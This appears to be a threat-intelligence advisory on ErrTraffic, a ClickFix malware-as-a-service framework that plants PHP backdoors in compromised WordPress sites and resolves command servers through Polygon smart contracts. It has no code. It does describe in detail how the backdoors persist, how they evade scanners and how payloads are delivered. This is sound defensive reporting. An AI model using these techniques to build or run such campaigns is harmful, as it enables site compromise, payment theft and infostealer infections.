ErrTraffic: ClickFix Malware-as-a-Service Distribution Framework Delivering Infostealers and Loaders via Compromised WordPress and EtherHiding Polygon C2 — Threadlinqs Intelligence
Threat ID: TL-2026-0817 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Attribution: LenAI · FINANCIAL
ErrTraffic is a Malware-as-a-Service ClickFix distribution framework that injects malicious JavaScript into compromised WordPress sites to deliver fake BSOD/reCAPTCHA/Cloudflare Turnstile lures,
ErrTraffic is an industrialized ClickFix malware-distribution framework operated as a Malware-as-a-Service (MaaS) and documented by Sekoia.io's Threat Detection & Research team in June 2026. The framework is distributed by the threat actor 'LenAI', who has advertised it on the Exploit.IN cybercrime forum and Telegram since December 2025, selling both monthly subscriptions ($300 rising to $380) and full source code ($1,500 rising to $3,000, then $4,500 for lifetime updates).
Initial access to victim infrastructure is achieved primarily through harvested WordPress administrator credentials — frequently stolen by upstream infostealers and surfaced in leak databases — replayed via residential proxies in tight credential-validation bursts (seven geographically distributed IPs validated stolen credentials within an 80-second window on 7 March 2026). After authenticating, operators modify the active theme's functions.php through the legitimate /wp-admin/theme-editor.php interface and deploy PHP backdoors as WordPress MU-plugins (e.g. session-manager.php in the 'Analytics' cluster). An automated toolkit also attempts pre-authentication RCE against the WP File Manager plugin (CVE-2020-25213), though exploitation was observed to be unsuccessful against the analyzed targets.
The deployed PHP backdoors are heavily persistent (a seven-layer model in the Analytics cluster: full MU-plugin copy in the WordPress database, a credential harvester re-injected hourly into wp-login.php, a theme functions.php stub, five scatter PHP files in legitimate directories, disabled automatic updates, and hidden-administrator-account creation). They evade detection by scanning User-Agents for security tooling (Wordfence, Sucuri, WPScan, Nessus, Nikto, Burp) and suspending activity for 30 minutes when such tooling is seen, and they expose multiple covert RCE channels (secret-key GET parameter, HMAC time-windowed cookie, and a REST API endpoint via the X-WP-Session header). The backdoors also perform WooCommerce/Magecart-style payment skimming and host JavaScript visitor analytics beacons.
The injected ErrTraffic JavaScript presents ClickFix social-engineering lures (fake Blue Screen of Death, fake reCAPTCHA, and fake Cloudflare Turnstile verification screens). A Traffic Distribution System (TDS) applies geolocation filtering, OS detection (Windows/macOS), HTTP referrer routing, and browser fingerprinting before serving a payload, and tracks visit/delivery/execution statistics. C2 endpoints are resolved using the EtherHiding 'Dead Drop Resolver' technique: the JavaScript queries Polygon blockchain smart contracts (via Quicknode and public JSON-RPC endpoints) whose state stores the current C2 domains, which rotate daily across rare TLDs (.beer, .cfd, .club, .click, .cyou, .lat, .sbs, .shop, .xyz). Payloads and API traffic are obfuscated with Base64, XOR, and RC4. Victims who follow the lure paste and run a PowerShell command (marked with decoy 'Code Verification' comments) that XOR-decrypts and downloads malware, often padded with binary bloating (120+ MB archives) to evade sandboxing.
Sekoia tracks two principal clusters. The 'Analytics' cluster appears to be a single unattributed operator who purchased an older, less-obfuscated source-code version and distributes Vidar exclusively. The 'Beer' cluster is run by LenAI as the MaaS platform itself, onboarding affiliates (e.g. 'tope'/'cybershell_master' tied to the Bintang campaign, and PPI operator 'mtd') who each receive distinct Polygon smart contracts and deliver a wider set of payloads including Stealc, Remus (a Lumma variant), Salat, DanaBot, HijackLoader, and SmokeLoader, alongside AI-themed impersonation campaigns (Google Antigravity, ChatGPT).
Weaknesses (CWE)
CWE-434, CWE-829, CWE-506, CWE-1021
Target sectors: technology, software-development, e-commerce, financial, cryptocurrency, web-services
Target regions: North America, Europe, Australia, Southeast Asia, Global
Detections & IOCs
This threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 30 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
MALWARE, HIGH, threat intelligence, cybersecurity, CVE-2020-25213, T1583, T1586, T1587.001, T1078, T1190, T1195.003, T1189, T1110.004, T1059.001, T1059.007